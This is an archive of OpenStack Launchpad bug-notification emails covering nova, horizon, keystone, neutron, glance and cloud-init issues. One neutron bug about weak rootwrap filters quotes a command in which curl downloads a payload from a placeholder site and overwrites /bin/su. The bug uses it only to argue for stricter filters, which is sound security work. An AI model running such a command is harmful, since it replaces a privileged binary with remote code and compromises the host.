  This is because the resource tracker caches the compute node
  object/dict and uses the 'id' to update the record. When this happens,
  rt.update_available_resources will raise a ComputeHostNotFound. This
  ends up short-circuiting the full run of the
  update_available_resource() periodic task.

  This mostly applies when using a virt driver where a nova-compute
  manages more than 1 "hypervisor".

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1352510/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487109] [NEW] No minimum test coverage for JavaScript

2015-08-20 Thread Rob Cresswell
Public bug reported:

JavaScript code in Horizon currently has no minimum test coverage, and
this should be amended.

** Affects: horizon
 Importance: Wishlist
 Assignee: Rob Cresswell (robcresswell)
 Status: In Progress

** Changed in: horizon
Milestone: None => liberty-3

** Changed in: horizon
   Importance: Undecided => Wishlist

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Dashboard (Horizon).
https://bugs.launchpad.net/bugs/1487109

Title:
  No minimum test coverage for JavaScript

Status in OpenStack Dashboard (Horizon):
  In Progress

Bug description:
  JavaScript code in Horizon currently has no minimum test coverage, and
  this should be amended.

To manage notifications about this bug go to:
https://bugs.launchpad.net/horizon/+bug/1487109/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487115] [NEW] Ephemeral user's id is not always urlsafe

2015-08-20 Thread Marek Denis
Public bug reported:

Ephemeral users' ids should always be url-safe. Sadly, if the mapping
rule specifies the user's id, the value will be passed as-is and never
url-encoded. We should change the auth.plugins.mapped.setup_username()
function and make sure user_id is always passed through the
six.moves.urllib.parse.quote() function.

** Affects: keystone
 Importance: Medium
 Assignee: Marek Denis (marek-denis)
 Status: In Progress


** Tags: federation

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Keystone.
https://bugs.launchpad.net/bugs/1487115

Title:
  Ephemeral user's id is not always urlsafe

Status in Keystone:
  In Progress

Bug description:
  Ephemeral users' ids should always be url-safe. Sadly, if the mapping
  rule specifies the user's id, the value will be passed as-is and never
  url-encoded. We should change the auth.plugins.mapped.setup_username()
  function and make sure user_id is always passed through the
  six.moves.urllib.parse.quote() function.
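
  A minimal illustration of the proposed treatment (the helper name is
  ours, not keystone's; only the quote() call is the point):

      from six.moves.urllib import parse

      def url_safe_user_id(user_id):
          # percent-encode anything that is not safe in a URL path segment
          return parse.quote(user_id)

      # url_safe_user_id('joe user@example.org') -> 'joe%20user%40example.org'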

To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1487115/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1482772] Re: Region filtering for endpoints does not work

2015-08-20 Thread Steve Martinelli
Looks like OSC  and KSC  already had the code to do this, so I'm marking
it as invalid for those projects

osc: 
https://github.com/openstack/python-openstackclient/blob/master/openstackclient/identity/v3/endpoint.py#L143-L147
ksc: 
https://github.com/openstack/python-keystoneclient/blob/master/keystoneclient/v3/endpoints.py#L70-L83

** Changed in: python-keystoneclient
   Status: New => Invalid

** Changed in: python-openstackclient
   Status: New => Invalid

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Keystone.
https://bugs.launchpad.net/bugs/1482772

Title:
  Region filtering for endpoints does not work

Status in Keystone:
  In Progress
Status in python-keystoneclient:
  Invalid
Status in python-openstackclient:
  Invalid

Bug description:
  When I run “openstack endpoint list --os-url http://192.168.33.10:5000/v3
  --os-identity-api-version=3 --service identity --interface public --region
  RegionTwo” I would expect it to list only endpoints from RegionTwo. But I
  get the identity endpoint from RegionOne. Here is the output:

  +----------------------------------+-----------+--------------+--------------+---------+-----------+--------------------------------+
  | ID                               | Region    | Service Name | Service Type | Enabled | Interface | URL                            |
  +----------------------------------+-----------+--------------+--------------+---------+-----------+--------------------------------+
  | 4b3efc615c044fb4a2c70ca2e5e7bba9 | RegionOne | keystone     | identity     | True    | public    | http://192.168.33.10:5000/v2.0 |
  +----------------------------------+-----------+--------------+--------------+---------+-----------+--------------------------------+

  As this snippet from the openstackclient debug output shows, the
  client sends the correct query to keystone. So I assume this is a
  filtering problem in keystone.

  DEBUG: requests.packages.urllib3.connectionpool "GET
  /v3/endpoints?interface=public&service_id=050872861656437184778a822032d8d6&region=RegionTwo
  HTTP/1.1" 200 506
  DEBUG: keystoneclient.session RESP: [200] content-length: 506 vary:
  X-Auth-Token keep-alive: timeout=5, max=96 server: Apache/2.4.7 (Ubuntu)
  connection: Keep-Alive date: Fri, 07 Aug 2015 19:37:08 GMT content-type:
  application/json x-openstack-request-id:
  req-72481573-7fff-4ae0-9a2f-33584b476bd3
  RESP BODY: {"endpoints": [{"region_id": "RegionOne", "links": {"self":
  "http://192.168.33.10:35357/v3/endpoints/4b3efc615c044fb4a2c70ca2e5e7bba9"},
  "url": "http://192.168.33.10:5000/v2.0", "region": "RegionOne", "enabled":
  true, "interface": "public", "service_id": "050872861656437184778a822032d8d6",
  "id": "4b3efc615c044fb4a2c70ca2e5e7bba9"}], "links": {"self":
  "http://192.168.33.10:35357/v3/endpoints?interface=public&service_id=050872861656437184778a822032d8d6&region=RegionTwo",
  "previous": null, "next": null}}

To manage notifications about this bug go to:
https://bugs.launchpad.net/keystone/+bug/1482772/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487139] [NEW] We need more strict filters for functional tests

2015-08-20 Thread Sergey Belous
Public bug reported:

Currently, for example, the tee program is not used in functional tests, but a
(very weak) filter for it exists in functional-testing.filters. Also, in its
current state the curl filter allows curl to be used to replace system files,
e.g.: curl -o /bin/su http://mycoolsite.in/my-virus-needs-suid
We need stricter filter settings for functional tests.

** Affects: neutron
 Importance: Undecided
 Assignee: Sergey Belous (sbelous)
 Status: New

** Changed in: neutron
 Assignee: (unassigned) => Sergey Belous (sbelous)

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to neutron.
https://bugs.launchpad.net/bugs/1487139

Title:
  We need more strict filters for functional tests

Status in neutron:
  New

Bug description:
  Currently, for example, the tee program is not used in functional tests, but
  a (very weak) filter for it exists in functional-testing.filters. Also, in
  its current state the curl filter allows curl to be used to replace system
  files, e.g.: curl -o /bin/su http://mycoolsite.in/my-virus-needs-suid
  We need stricter filter settings for functional tests.
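
  As an illustration only, a tighter rule could look something like the
  following hypothetical rootwrap RegExpFilter entry (not the actual
  contents of functional-testing.filters):

      [Filters]
      # only allow curl to download over http(s) into /tmp, rather than
      # permitting an arbitrary output path such as /bin/su
      curl: RegExpFilter, curl, root, curl, -o, /tmp/.+, https?://.+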

To manage notifications about this bug go to:
https://bugs.launchpad.net/neutron/+bug/1487139/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487140] [NEW] Remove _40_router.py.example

2015-08-20 Thread Abishek Subramanian
Public bug reported:

Given the "Router" dashboard has been moved out of master and into the
horizon-cisco-ui Repo, the _40_router.py.example file is no longer
necessary in master. Deleting this file.

** Affects: horizon
 Importance: Undecided
 Assignee: Abishek Subramanian (absubram)
 Status: In Progress

** Changed in: horizon
 Assignee: (unassigned) => Abishek Subramanian (absubram)

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Dashboard (Horizon).
https://bugs.launchpad.net/bugs/1487140

Title:
  Remove _40_router.py.example

Status in OpenStack Dashboard (Horizon):
  In Progress

Bug description:
  Given the "Router" dashboard has been moved out of master and into the
  horizon-cisco-ui Repo, the _40_router.py.example file is no longer
  necessary in master. Deleting this file.

To manage notifications about this bug go to:
https://bugs.launchpad.net/horizon/+bug/1487140/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487038] Re: nova.exception._cleanse_dict should use oslo_utils.strutils._SANITIZE_KEYS

2015-08-20 Thread Matt Riedemann
Per comment 1, I assume the _cleanse_dict method would continue to
remove the keys.

** Also affects: oslo.messaging
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1487038

Title:
  nova.exception._cleanse_dict should use
  oslo_utils.strutils._SANITIZE_KEYS

Status in OpenStack Compute (nova):
  Confirmed
Status in oslo.messaging:
  Confirmed

Bug description:
  The wrap_exception decorator in nova.exception uses the _cleanse_dict
  helper method to remove any keys from the args/kwargs list of the
  method that was called, but only checks those keys of the form *_pass:

  
http://git.openstack.org/cgit/openstack/nova/tree/nova/exception.py?id=12.0.0.0b2#n57

  def _cleanse_dict(original):
  """Strip all admin_password, new_pass, rescue_pass keys from a dict."""
  return {k: v for k, v in six.iteritems(original) if "_pass" not in k}

  The oslo_utils.strutils module has its own list of keys to sanitize,
  used in its mask_password method:

  
http://git.openstack.org/cgit/openstack/oslo.utils/tree/oslo_utils/strutils.py#n54

  _SANITIZE_KEYS = ['adminPass', 'admin_pass', 'password', 'admin_password',
'auth_token', 'new_pass', 'auth_password', 'secret_uuid',
'sys_pswd']

  The nova code should probably be using some form of the same thing
  that strutils is using for mask_password, which uses a regex to find
  hits.  For example, if the arg was 'auth_token' or simply 'password',
  _cleanse_dict would fail to filter it out.

  You could also argue that the oslo.messaging log notifier should be
  using oslo_utils.strutils.mask_password before it logs the message -
  which isn't happening in that library today.
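
  One possible shape for a stricter helper, sketched here only (the key
  list is the _SANITIZE_KEYS list quoted above; this is not the actual
  nova or oslo code):

      import re
      import six

      _SENSITIVE = re.compile(r'(adminPass|admin_pass|password|admin_password|'
                              r'auth_token|new_pass|auth_password|secret_uuid|'
                              r'sys_pswd)', re.IGNORECASE)

      def _cleanse_dict(original):
          # drop any key that matches one of the known sensitive names
          return {k: v for k, v in six.iteritems(original)
                  if not _SENSITIVE.search(k)}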

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1487038/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1470880] Re: [SRU] GCE datasource reports availability zones incorrectly

2015-08-20 Thread Chris J Arges
** Also affects: cloud-init (Ubuntu)
   Importance: Undecided
   Status: New

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to cloud-init.
https://bugs.launchpad.net/bugs/1470880

Title:
  [SRU] GCE datasource reports availability zones incorrectly

Status in cloud-init:
  In Progress
Status in cloud-init package in Ubuntu:
  New

Bug description:
  [Impact]
  Availability zones and regions on GCE cannot be used for mirror substitution, 
making in-cloud mirrors impossible.

  [Test Case]
  Run the following Python code on trusty and later:

  from cloudinit.sources.DataSourceGCE import DataSourceGCE
  ds = DataSourceGCE({}, None, None)
  ds.get_data()
  ds.availability_zone

  Or the following code on precise:

  from cloudinit.DataSourceGCE import DataSourceGCE
  ds = DataSourceGCE({})
  ds.get_data()
  ds.get_availability_zone()

  and confirm that the availability zone is returned (rather than a
  relative URL).

  [Regression Potential]
  This is completely broken at the moment, so it can't get any more broken.

  [Original Report]
  After querying the cloud fabric, DataSourceGCE will return something along 
the lines of "projects/969378662406/zones/europe-west1-d" as its 
availability_zone.

  This means that other parts of the code that expect a sensible value
  for this (most notably the mirror discovery code), are broken on GCE.
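
  A minimal sketch of the normalisation this implies (an assumed helper,
  not the actual cloud-init patch): the metadata value is a relative URL
  such as 'projects/969378662406/zones/europe-west1-d', and only the final
  component is a usable availability zone.

      def normalise_gce_zone(raw):
          return raw.rsplit('/', 1)[-1]

      # normalise_gce_zone('projects/969378662406/zones/europe-west1-d')
      # -> 'europe-west1-d'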

To manage notifications about this bug go to:
https://bugs.launchpad.net/cloud-init/+bug/1470880/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1470890] Re: [SRU] cc_apt_configure does not understand regions

2015-08-20 Thread Chris J Arges
** Package changed: ubuntu => cloud-init (Ubuntu)

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to cloud-init.
https://bugs.launchpad.net/bugs/1470890

Title:
  [SRU] cc_apt_configure does not understand regions

Status in cloud-init:
  In Progress
Status in cloud-init package in Ubuntu:
  New

Bug description:
  [Impact]
  In GCE, we want to deploy Ubuntu mirrors per-region.  At the moment, it is 
impossible to configure cloud-init to look for mirrors with the instance's 
region substituted in to the mirror DNS name.  This will allow us to do so, 
which will allow us to improve the experience for Ubuntu users on GCE, both in 
terms of mirror responsiveness and bandwidth costs.

  [Test Case]
  On GCE, specify a primary mirror search URL of 
"http://%(region)s.gce.clouds.archive.ubuntu.com/ubuntu/" and run cloud-init. 
When running 'apt-get update', you should see a mirror URL which matches the 
above with the instance's region substituted in.

  [Regression Potential]
  There are two existing substitutions for mirror strings: availability_zone 
and ec2_region.  We will need to ensure that each of these can still be used 
(testing specifically on EC2 for the latter).

  [Original Report]
  In _get_package_mirror_info (in cloudinit/distros/__init__.py), there is code 
that specifically handles converting EC2 availability zones to their 
corresponding regions. This won't work for other clouds that don't have the 
same form for availability zones (and even if they _do_, they'll have to be 
configured using strings containing 'ec2'; weird), which is problematic.

  This is particularly a problem for GCE.
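
  A hedged illustration of the substitution being asked for (the helper and
  the zone-to-region rule are assumptions for GCE-style zone names; the
  mirror template is the one given in the test case above):

      def region_from_zone(availability_zone):
          # 'europe-west1-d' -> 'europe-west1'
          return availability_zone.rsplit('-', 1)[0]

      mirror = ('http://%(region)s.gce.clouds.archive.ubuntu.com/ubuntu/'
                % {'region': region_from_zone('europe-west1-d')})
      # -> 'http://europe-west1.gce.clouds.archive.ubuntu.com/ubuntu/'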

To manage notifications about this bug go to:
https://bugs.launchpad.net/cloud-init/+bug/1470890/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1470880] Re: [SRU] GCE datasource reports availability zones incorrectly

2015-08-20 Thread Chris J Arges
Hello Dan, or anyone else affected,

Accepted cloud-init into vivid-proposed. The package will build now and
be available at https://launchpad.net/ubuntu/+source/cloud-
init/0.7.7~bzr1091-0ubuntu5 in a few hours, and then in the -proposed
repository.

Please help us by testing this new package.  See
https://wiki.ubuntu.com/Testing/EnableProposed for documentation how to
enable and use -proposed.  Your feedback will aid us getting this update
out to other Ubuntu users.

If this package fixes the bug for you, please add a comment to this bug,
mentioning the version of the package you tested, and change the tag
from verification-needed to verification-done. If it does not fix the
bug for you, please add a comment stating that, and change the tag to
verification-failed.  In either case, details of your testing will help
us make a better decision.

Further information regarding the verification process can be found at
https://wiki.ubuntu.com/QATeam/PerformingSRUVerification .  Thank you in
advance!

** Also affects: cloud-init (Ubuntu Vivid)
   Importance: Undecided
   Status: New

** Also affects: cloud-init (Ubuntu Trusty)
   Importance: Undecided
   Status: New

** Also affects: cloud-init (Ubuntu Precise)
   Importance: Undecided
   Status: New

** Changed in: cloud-init (Ubuntu)
   Status: New => Fix Released

** Changed in: cloud-init (Ubuntu Vivid)
   Status: New => Fix Committed

** Tags added: verification-needed

** Changed in: cloud-init (Ubuntu Trusty)
   Status: New => Fix Committed

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to cloud-init.
https://bugs.launchpad.net/bugs/1470880

Title:
  [SRU] GCE datasource reports availability zones incorrectly

Status in cloud-init:
  In Progress
Status in cloud-init package in Ubuntu:
  Fix Released
Status in cloud-init source package in Precise:
  Fix Committed
Status in cloud-init source package in Trusty:
  Fix Committed
Status in cloud-init source package in Vivid:
  Fix Committed

Bug description:
  [Impact]
  Availability zones and regions on GCE cannot be used for mirror substitution, 
making in-cloud mirrors impossible.

  [Test Case]
  Run the following Python code on trusty and later:

  from cloudinit.sources.DataSourceGCE import DataSourceGCE
  ds = DataSourceGCE({}, None, None)
  ds.get_data()
  ds.availability_zone

  Or the following code on precise:

  from cloudinit.DataSourceGCE import DataSourceGCE
  ds = DataSourceGCE({})
  ds.get_data()
  ds.get_availability_zone()

  and confirm that the availability zone is returned (rather than a
  relative URL).

  [Regression Potential]
  This is completely broken at the moment, so it can't get any more broken.

  [Original Report]
  After querying the cloud fabric, DataSourceGCE will return something along 
the lines of "projects/969378662406/zones/europe-west1-d" as its 
availability_zone.

  This means that other parts of the code that expect a sensible value
  for this (most notably the mirror discovery code), are broken on GCE.

To manage notifications about this bug go to:
https://bugs.launchpad.net/cloud-init/+bug/1470880/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1470890] Re: [SRU] cc_apt_configure does not understand regions

2015-08-20 Thread Chris J Arges
Hello Dan, or anyone else affected,

Accepted cloud-init into vivid-proposed. The package will build now and
be available at https://launchpad.net/ubuntu/+source/cloud-
init/0.7.7~bzr1091-0ubuntu5 in a few hours, and then in the -proposed
repository.

Please help us by testing this new package.  See
https://wiki.ubuntu.com/Testing/EnableProposed for documentation how to
enable and use -proposed.  Your feedback will aid us getting this update
out to other Ubuntu users.

If this package fixes the bug for you, please add a comment to this bug,
mentioning the version of the package you tested, and change the tag
from verification-needed to verification-done. If it does not fix the
bug for you, please add a comment stating that, and change the tag to
verification-failed.  In either case, details of your testing will help
us make a better decision.

Further information regarding the verification process can be found at
https://wiki.ubuntu.com/QATeam/PerformingSRUVerification .  Thank you in
advance!

** Also affects: cloud-init (Ubuntu Precise)
   Importance: Undecided
   Status: New

** Also affects: cloud-init (Ubuntu Vivid)
   Importance: Undecided
   Status: New

** Also affects: cloud-init (Ubuntu Trusty)
   Importance: Undecided
   Status: New

** Changed in: cloud-init (Ubuntu)
   Status: New => Fix Released

** Changed in: cloud-init (Ubuntu Vivid)
   Status: New => Fix Committed

** Tags added: verification-needed

** Changed in: cloud-init (Ubuntu Trusty)
   Status: New => Fix Committed

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to cloud-init.
https://bugs.launchpad.net/bugs/1470890

Title:
  [SRU] cc_apt_configure does not understand regions

Status in cloud-init:
  In Progress
Status in cloud-init package in Ubuntu:
  Fix Released
Status in cloud-init source package in Precise:
  Fix Committed
Status in cloud-init source package in Trusty:
  Fix Committed
Status in cloud-init source package in Vivid:
  Fix Committed

Bug description:
  [Impact]
  In GCE, we want to deploy Ubuntu mirrors per-region.  At the moment, it is 
impossible to configure cloud-init to look for mirrors with the instance's 
region substituted in to the mirror DNS name.  This will allow us to do so, 
which will allow us to improve the experience for Ubuntu users on GCE, both in 
terms of mirror responsiveness and bandwidth costs.

  [Test Case]
  On GCE, specify a primary mirror search URL of 
"http://%(region)s.gce.clouds.archive.ubuntu.com/ubuntu/" and run cloud-init. 
When running 'apt-get update', you should see a mirror URL which matches the 
above with the instance's region substituted in.

  [Regression Potential]
  There are two existing substitutions for mirror strings: availability_zone 
and ec2_region.  We will need to ensure that each of these can still be used 
(testing specifically on EC2 for the latter).

  [Original Report]
  In _get_package_mirror_info (in cloudinit/distros/__init__.py), there is code 
that specifically handles converting EC2 availability zones to their 
corresponding regions. This won't work for other clouds that don't have the 
same form for availability zones (and even if they _do_, they'll have to be 
configured using strings containing 'ec2'; weird), which is problematic.

  This is particularly a problem for GCE.

To manage notifications about this bug go to:
https://bugs.launchpad.net/cloud-init/+bug/1470890/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487176] [NEW] `nova-manage db expand` fails in dry run mode

2015-08-20 Thread Brian Elliott
Public bug reported:

"nova-manage db expand --dry-run" will fail if the `locked` column has
never been added to the migrate_version table via a previous "live"
expand operation.

The following error results because the `locked` column doesn't exist:
http://paste.openstack.org/show/422748/

The DB should not be locked for an expand dry run.

** Affects: nova
 Importance: Undecided
 Status: New

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1487176

Title:
  `nova-manage db expand` fails in dry run mode

Status in OpenStack Compute (nova):
  New

Bug description:
  "nova-manage db expand --dry-run" will fail if the `locked` column has
  never been added to the migrate_version table via a previous "live"
  expand operation.

  The following error results because the `locked` column doesn't exist:
  http://paste.openstack.org/show/422748/

  The DB should not be locked for an expand dry run.

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1487176/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1487048] Re: logic error in metadata_to_dict utility function

2015-08-20 Thread Brian Rosmaita
I'm withdrawing this.  The filter_deleted flag should really be named
'include_deleted', and the logic around this is a bit convoluted.  Feel
free to read through the original gerrit reviews to see why this change
was made.

** Changed in: nova
   Status: New => Invalid

** Changed in: nova
 Assignee: Brian Rosmaita (brian-rosmaita) => (unassigned)

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1487048

Title:
  logic error in metadata_to_dict utility function

Status in OpenStack Compute (nova):
  Invalid

Bug description:
  Change b7e9a64416ff239a4c1b8501f398796b02c46ce7 introduces a
  filter_deleted flag into the metadata_to_dict function.  The way this
  flag is used at
  
https://github.com/openstack/nova/blob/a2d5492e8a15cdc13ada61b03f6293c709160505/nova/utils.py#L850
  however, has the effect that when filter_deleted is true, all instance
  system metadata will be returned in the dict even if such metadata is
  deleted, contrary to the purpose of the flag.

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1487048/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1472712] Re: [SRU] Using SSL with rabbitmq prevents communication between nova-compute and conductor after latest nova updates

2015-08-20 Thread Launchpad Bug Tracker
This bug was fixed in the package python-amqp - 1.3.3-1ubuntu1.1

---
python-amqp (1.3.3-1ubuntu1.1) trusty; urgency=medium

  * Ensure SSL read timeouts raised properly (LP: #1472712):
- d/p/dont-disconnect-transport-on-ssl-read-timeout.patch:
  Backport patch from 1.4.4.

 -- Edward Hope-Morley   Mon, 10 Aug
2015 15:57:44 +0100

** Changed in: python-amqp (Ubuntu Trusty)
   Status: Fix Committed => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1472712

Title:
  [SRU] Using SSL with rabbitmq prevents communication between nova-
  compute and conductor after latest nova updates

Status in OpenStack Compute (nova):
  Invalid
Status in oslo.messaging:
  Invalid
Status in python-amqp package in Ubuntu:
  Fix Released
Status in python-amqp source package in Trusty:
  Fix Released

Bug description:
  [Impact]

  The current oslo.messaging and python-amqp result in repeated connection
  timeouts in the amqp transport layer (SSLError) and thus excessive
  reconnect attempts. This is a known issue that was fixed in python-
  amqp 1.4.4.

  [Test Case]

  Deploy openstack using current Trusty versions + this version of
  python-amqp + rabbitmq configured to allow ssl connections only. Once
  up and running, check the following:

   - number of rabbitmq connections - with single nova-compute,
  conductor etc I see approx 20 connections whereas previously I saw
  well over 100 and rising.

  sudo rabbitmqctl list_connections

  - check that messages are being consumed from openstack queues

  sudo rabbitmqctl list_queues -p openstack consumers messages name

  - also check e.g. nova-compute and nova-conductor logs and verify that
  the errors mentioned below no longer appear

  [Regression Potential]

  None.

  [Other Info]

  None.

    - 

  On the latest update of the Ubuntu OpenStack packages, it was
  discovered that the nova-compute/nova-conductor
  (1:2014.1.4-0ubuntu2.1) packages encountered a bug with using SSL to
  connect to rabbitmq.

  When this problem occurs, the compute node cannot connect to the
  controller, and this message is constantly displayed:

  WARNING nova.conductor.api [req-4022395c-9501-47cf-bf8e-476e1cc58772
  None None] Timed out waiting for nova-conductor. Is it running? Or did
  this service start before nova-conductor?

  Investigation revealed that having rabbitmq configured with SSL was
  the root cause of this problem.  This seems to have been introduced
  with the current version of the nova packages.   Rabbitmq was not
  updated as part of this distribution update, but the messaging library
  (python-oslo.messaging 1.3.0-0ubuntu1.1) was updated.   So the problem
  could exist in any of these components.

  Versions installed:
  Openstack version: Icehouse
  Ubuntu 14.04.2 LTS
  nova-conductor1:2014.1.4-0ubuntu2.1
  nova-compute1:2014.1.4-0ubuntu2.1
  rabbitmq-server  3.2.4-1
  openssl:amd64/trusty-security   1.0.1f-1ubuntu2.15

To manage notifications about this bug go to:
https://bugs.launchpad.net/nova/+bug/1472712/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1447215] Re: Schema Missing kernel_id, ramdisk_id causes #1447193

2015-08-20 Thread Launchpad Bug Tracker
This bug was fixed in the package glance - 1:2015.1.1-0ubuntu2

---
glance (1:2015.1.1-0ubuntu2) vivid; urgency=medium

  * Additional support for stable/kilo (LP: #1481008):
- d/p/fix-test-artifacts-plugin-loader.patch: Added to fix failing tests.
- d/p/skip-glance-search-tests.patch: Added to fix failing tests.
- d/p/skip-online-tests.patch: Added to skip tests that require online 
access
  during Ubuntu builds.

 -- Corey Bryant   Wed, 05 Aug 2015 17:53:11
-0400

** Changed in: glance (Ubuntu Vivid)
   Status: In Progress => Fix Released

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to Glance.
https://bugs.launchpad.net/bugs/1447215

Title:
  Schema Missing kernel_id, ramdisk_id causes #1447193

Status in Glance:
  Fix Released
Status in Glance kilo series:
  Fix Committed
Status in glance package in Ubuntu:
  In Progress
Status in glance source package in Vivid:
  Fix Released

Bug description:
  [Description]

  
  [Environment]

  - Ubuntu 14.04.2
  - OpenStack Kilo

  ii  glance   1:2015.1~rc1-0ubuntu2~cloud0 all 
 OpenStack Image Registry and Delivery Service - Daemons
  ii  glance-api   1:2015.1~rc1-0ubuntu2~cloud0 all 
 OpenStack Image Registry and Delivery Service - API
  ii  glance-common1:2015.1~rc1-0ubuntu2~cloud0 all 
 OpenStack Image Registry and Delivery Service - Common
  ii  glance-registry  1:2015.1~rc1-0ubuntu2~cloud0 all 
 OpenStack Image Registry and Delivery Service - Registry
  ii  python-glance1:2015.1~rc1-0ubuntu2~cloud0 all 
 OpenStack Image Registry and Delivery Service - Python library
  ii  python-glance-store  0.4.0-0ubuntu1~cloud0all 
 OpenStack Image Service store library - Python 2.x
  ii  python-glanceclient  1:0.15.0-0ubuntu1~cloud0 all 
 Client library for Openstack glance server.

  [Steps to reproduce]

  0) Set /etc/glance/glance-api.conf to enable_v2_api=False
  1) nova boot --flavor m1.small --image base-image --key-name keypair 
--availability-zone nova --security-groups default snapshot-bug 
  2) nova image-create snapshot-bug snapshot-bug-instance 

  At this point the created image has no kernel_id (None) and image_id
  (None)

  3) Set enable_v2_api=True in glance-api.conf and restart.

  4) Run an os-image-api=2 client,

  $ glance --os-image-api-version 2 image-list

  This will fail with #1447193

  [Description]

  The schema-image.json file needs to be modified to allow null, string
  values for both attributes.
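
  A sketch of the kind of change being described (illustrative JSON only;
  the exact entries in schema-image.json may differ):

      "kernel_id": {
          "type": ["null", "string"],
          "description": "ID of a Glance image used as the kernel when booting an AMI-style image."
      },
      "ramdisk_id": {
          "type": ["null", "string"],
          "description": "ID of a Glance image used as the ramdisk when booting an AMI-style image."
      }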

To manage notifications about this bug go to:
https://bugs.launchpad.net/glance/+bug/1447215/+subscriptions

-- 
Mailing list: https://launchpad.net/~yahoo-eng-team
Post to : yahoo-eng-team@lists.launchpad.net
Unsubscribe : https://launchpad.net/~yahoo-eng-team
More help   : https://help.launchpad.net/ListHelp


[Yahoo-eng-team] [Bug 1199536] Re: Move dict test matchers into testtools

2015-08-20 Thread David Stanek
Keystone no longer maintains those matchers so there isn't anything to
fix anymore. The keystone/test/matcher.py module was removed in
https://review.openstack.org/#/c/154242/

** Changed in: keystone
   Status: Triaged => Invalid

-- 
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Compute (nova).
https://bugs.launchpad.net/bugs/1199536

Title:
  Move dict test matchers into testtools

Status in Ironic:
  Triaged
